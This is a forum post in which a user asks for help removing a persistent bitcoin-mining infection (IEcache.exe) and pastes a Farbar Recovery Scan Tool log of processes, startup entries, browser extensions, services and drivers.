BitCoin Miner - IECache.exe

Cryman
Visitor
Posts: 6
Registered: 08 Nov 2014 12:18

#1 Post by Cryman »

Hello, I'm turning to you for advice about a bitcoin miner virus :(. I have 100% CPU usage and unfortunately Malwarebytes, even though it finds the virus, cannot remove it - after a restart it is back. So I'm attaching the FRST log; many thanks in advance for your willingness and your time!

FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23.08.2018
Ran by cheat (administrator) on DESKTOP-1JRDM4L (24-08-2018 21:34:35)
Running from C:\Users\cheat\Desktop
Loaded Profiles: cheat (Available Profiles: cheat)
Platform: Windows 10 Pro Version 1803 17134.228 (X64) Language: Čeština (Česko)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

Failed to access process -> Secure System
(Microsoft Corporation) C:\Windows\System32\LsaIso.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AXSP\4.00.01\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.28\AsusFanControlService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Digital Wave Ltd.) C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\LightingService\LightingService.exe
() C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.22\AsSysCtrlService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Microsoft Corporation) C:\Windows\System32\vmms.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
() C:\Program Files (x86)\Steam\steamapps\common\wallpaper_engine\bin\wallpaperservice32_c.exe
(Microsoft Corporation) C:\Windows\System32\vmcompute.exe
() C:\Program Files (x86)\LightingService\AsRogAuraGpuDllServer.exe
() C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzUpdt.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
(ASUSTeK COMPUTER INC.) C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.0_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
() C:\Users\cheat\AppData\Roaming\sui.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\USB 3.0 Boost\U3BoostSvr64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(BitTorrent, Inc.) C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(ASUS) C:\Program Files (x86)\ASUS\ASUS ROG Gaming Mouse GX1000\Hid.exe
(ASUS) C:\Program Files (x86)\ASUS\ASUS ROG Gaming Mouse GX1000\TrayIcon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Windows\System32\schtasks.exe
(ShareX Team) C:\Program Files\ShareX\ShareX.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(ASUSTeK COMPUTER INC.) C:\Program Files (x86)\ASUS\GPU TweakII\Monitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Intel(R) Corporation) C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\XtuService.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Ghisler Software GmbH) C:\totalcmd\TOTALCMD64.EXE
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Microsoft Corporation) C:\Windows\System32\schtasks.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
() C:\Windows\IEcache.exe
() C:\Windows\IEcache.exe
() C:\Windows\IEcache.exe
() C:\Windows\IEcache.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9228800 2017-06-29] (Realtek Semiconductor)
HKLM-x32\...\Run: [ASUS GX1000] => C:\Program Files (x86)\ASUS\ASUS ROG Gaming Mouse GX1000\Hid.exe [1854976 2012-10-25] (ASUS)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [Google Update] => C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\GoogleUpdateCore.exe [601680 2018-06-02] (Google Inc.)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [4100152 2018-06-02] (Tonec Inc.)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3201312 2018-06-09] (Valve Corporation)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [qBittorrent] => "C:\Program Files\qBittorrent\qbittorrent.exe"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [Spotify] => C:\Users\cheat\AppData\Roaming\Spotify\Spotify.exe [24453008 2018-08-23] (Spotify Ltd)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [uTorrent] => C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe [416168 2015-02-22] (BitTorrent, Inc.)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\MountPoints2: {a2ef062f-a39b-11e8-ab75-ac220bc546a4} - "D:\Lenovo_Suite.exe"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\MountPoints2: {a2ef065f-a39b-11e8-ab75-ac220bc546a4} - "D:\Lenovo_Suite.exe"
InternetURL: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Revenge.URL -> URL: file:///C:\Users\cheat\AppData\Roaming\sui.exe
Startup: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setupm.js [2018-07-27] ()
Startup: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ShareX.lnk [2018-07-01]
ShortcutTarget: ShareX.lnk -> C:\Program Files\ShareX\ShareX.exe (ShareX Team)
Startup: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js.lnk [2018-08-21]
ShortcutTarget: Update.js.lnk -> C:\Users\cheat\AppData\Local\Temp\Update.js ()
GroupPolicy: Restriction ? <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{7652fcd8-0820-44e0-a6d7-3b768b453d55}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{7f284cae-ca04-4d88-acef-cd41db740f03}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{f39b9dd4-1e2b-460f-8b1c-417c10375737}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2017-12-14] (Internet Download Manager, Tonec Inc.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-07-19] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-07-19] (Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2017-12-14] (Internet Download Manager, Tonec Inc.)

FireFox:
========
FF DefaultProfile: sctnr9hv.default
FF ProfilePath: C:\Users\cheat\AppData\Roaming\Mozilla\Firefox\Profiles\sctnr9hv.default [2018-07-27]
FF HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Firefox\Extensions: [mozilla_cc3@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2018-02-28]
FF HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\cheat\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\cheat\AppData\Roaming\IDM\idmmzcc5 [2018-06-02] [Legacy] [not signed]
FF HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Legacy]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-07-19] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-07-19] (Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-05-29] (VideoLAN)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-06-24] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-06-24] (NVIDIA Corporation)
FF Plugin-x32: @tools.asus.com/ASUS Update;version=3 -> C:\Program Files (x86)\ASUS\Update\1.3.101.0\npAsusUpdate3.dll [2018-06-03] (ASUSTeK Computer Inc.)
FF Plugin-x32: @tools.asus.com/ASUS Update;version=9 -> C:\Program Files (x86)\ASUS\Update\1.3.101.0\npAsusUpdate3.dll [2018-06-03] (ASUSTeK Computer Inc.)
FF Plugin HKU\S-1-5-21-1409225181-4065645274-1912239689-1002: @tools.google.com/Google Update;version=3 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-1409225181-4065645274-1912239689-1002: @tools.google.com/Google Update;version=9 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-02] (Google Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxps://news.google.cz/
CHR StartupUrls: Default -> "hxxp://www.google.cz/"
CHR DefaultSearchKeyword: Default -> lp
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default [2018-08-24]
CHR Extension: (Prezentace) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-02]
CHR Extension: (Dokumenty) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-02]
CHR Extension: (Disk Google) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-02]
CHR Extension: (MEGA) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2018-08-24]
CHR Extension: (YouTube) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-02]
CHR Extension: (Pushbullet) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\chlffgpmiacpedhhbkiomidkjlcfhogd [2018-08-17]
CHR Extension: (uBlock Origin) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2018-08-14]
CHR Extension: (Clear Cache) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\cppjkneekbjaeellbfkmgnhonkkjfpdn [2018-06-02]
CHR Extension: (Dark Mode) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\dmghijelimhndkbmpgbldicpogfkceaj [2018-08-18]
CHR Extension: (Session Buddy) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2018-06-02]
CHR Extension: (Hudba Google Play) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2018-07-18]
CHR Extension: (Toolkit For FB) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcachklhcihfinmagjnlomehfdhndhep [2018-08-22]
CHR Extension: (Lightstream) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fccoaofanbnnabehannjhhakiibdpdjg [2018-07-01]
CHR Extension: (Tabulky) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-02]
CHR Extension: (Stylish - Custom themes for any website) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2018-06-22]
CHR Extension: (Unshorten.link) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbobdaaeaihkghbokihkofcbndhmbdpd [2018-06-02]
CHR Extension: (Dokumenty Google offline) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-16]
CHR Extension: (AdBlock) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-07-25]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2018-08-23]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2018-08-23]
CHR Extension: (Just Delete Me) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\hfpofkfbabpbbmchmiekfnlcgaedbgcf [2018-07-05]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2018-06-19]
CHR Extension: (PictureMate - View tagged FB pics) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\khmlalkcjmglpgdkmkmmgjcajahkoigj [2018-07-26]
CHR Extension: (Linkclump) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\lfpjkncokllnfokkgpkobnkbkmelfefj [2018-06-09]
CHR Extension: (Facebook Screen Sharing) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ncfpggehkhmjpdjpefomjchjafhmbnai [2018-06-11]
CHR Extension: (The Space ) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nchoeafalnaacdkpoodkjnbogigpjabk [2018-07-08]
CHR Extension: (IDM Integration Module) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-06-23]
CHR Extension: (Super Dark Mode) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlgphodeccebbcnkgmokeegopgpnjfkc [2018-08-23]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-02]
CHR Extension: (Chrome Apps & Extensions Developer Tool) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohmmkhmmmpcnpikjeljgnaoabkaalbgc [2018-06-02]
CHR Extension: (Spořič dat) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfmgfdlgomnbgkofeojodiodmgpgmkac [2018-06-04]
CHR Extension: (Gmail) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-02]
CHR Extension: (Chrome Media Router) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-08-10]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2018-03-30]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2018-03-30]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2018-04-27] (Apple Inc.)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\4.00.01\atkexComSvc.exe [382424 2018-01-05] (ASUSTeK Computer Inc.)
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2013-08-01] (ASUSTeK Computer Inc.)
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.22\AsSysCtrlService.exe [1360016 2015-08-20] () [File not signed]
S2 asus; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [157016 2018-06-03] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.28\AsusFanControlService.exe [398648 2015-08-20] (ASUSTeK Computer Inc.)
S3 asusm; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [157016 2018-06-03] (ASUSTeK Computer Inc.)
R2 DigitalWave.Update.Service; C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe [440808 2018-08-02] (Digital Wave Ltd.)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [779392 2018-07-22] (EasyAntiCheat Ltd)
S3 HgClientService; C:\Windows\system32\hgclientservice.dll [141824 2018-06-09] (Microsoft Corporation)
R3 hns; C:\Windows\System32\HostNetSvc.dll [1709056 2018-07-14] (Microsoft Corporation)
R2 Intel(R) PROSet Monitoring Service; C:\Windows\system32\IProsetMonitor.exe [505856 2018-01-31] (Intel Corporation) [File not signed]
R2 LightingService; C:\Program Files (x86)\LightingService\LightingService.exe [1276376 2018-04-25] (ASUSTek Computer Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6541008 2018-05-09] (Malwarebytes)
R3 nvagent; C:\Windows\System32\NvAgent.dll [31232 2018-06-09] (Microsoft Corporation)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [764352 2018-05-23] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [764352 2018-05-23] (NVIDIA Corporation)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Corporation)
S4 ssh-agent; C:\Windows\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11293936 2018-04-03] (TeamViewer GmbH)
R3 vmcompute; C:\Windows\system32\vmcompute.exe [3014656 2018-08-03] (Microsoft Corporation)
R2 vmms; C:\Windows\system32\vmms.exe [15202816 2018-05-20] (Microsoft Corporation)
R2 Wallpaper Engine Service; C:\Program Files (x86)\Steam\steamapps\common\wallpaper_engine\bin\wallpaperservice32_c.exe [348136 2018-06-03] ()
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\NisSrv.exe [4682552 2018-06-03] (Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MsMpEng.exe [101096 2018-06-03] (Microsoft Corporation)
R2 XTU3SERVICE; C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\XtuService.exe [18736 2018-05-17] (Intel(R) Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AIDA64Driver; C:\Program Files (x86)\AIDA64\kerneld.x64 [45696 2018-04-15] ()
S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [20640 2018-04-26] (Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-04-26] (Apple Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-03] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2012-09-14] ()
R3 ASUSFILTER; C:\Windows\SysWow64\drivers\ASUSFILTER.sys [46152 2011-09-20] (MCCI Corporation)
R3 DroidCam; C:\Windows\system32\DRIVERS\droidcam.sys [33592 2015-05-24] (Dev47Apps)
R3 DroidCamVideo; C:\Windows\system32\DRIVERS\droidcamvideo.sys [230712 2015-05-24] (Windows (R) Win 7 DDK provider)
R3 FocusriteUSB; C:\Windows\System32\drivers\FocusriteUSB.sys [96400 2018-01-09] (Focusrite Audio Engineering Ltd.)
R3 FocusriteUSBAudio; C:\Windows\system32\drivers\FocusriteUSBAudio.sys [54416 2018-01-09] (Focusrite Audio Engineering Ltd.)
R3 FocusriteUSBSwRoot; C:\Windows\System32\drivers\FocusriteUSBSwRoot.sys [97936 2018-01-09] (Focusrite Audio Engineering Ltd.)
R1 GLCKIO2; C:\Windows\system32\drivers\GLCKIO2.sys [19392 2018-04-23] ()
R3 GX1000MS; C:\Windows\system32\drivers\GX1000MS.sys [25600 2012-06-27] ( )
R3 hvsocketcontrol; C:\Windows\system32\drivers\hvsocketcontrol.sys [26624 2018-06-09] (Microsoft Corporation)
R2 iocbios2; C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\Drivers\IocDriver\64bit\iocbios2.sys [37104 2018-05-09] (Intel Corporation)
R3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [34064 2017-05-08] (ASUSTeK Computer Inc.)
S3 lunparser; C:\Windows\System32\drivers\lunparser.sys [23040 2018-06-09] (Microsoft Corporation)
R0 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [259360 2018-08-19] (Malwarebytes)
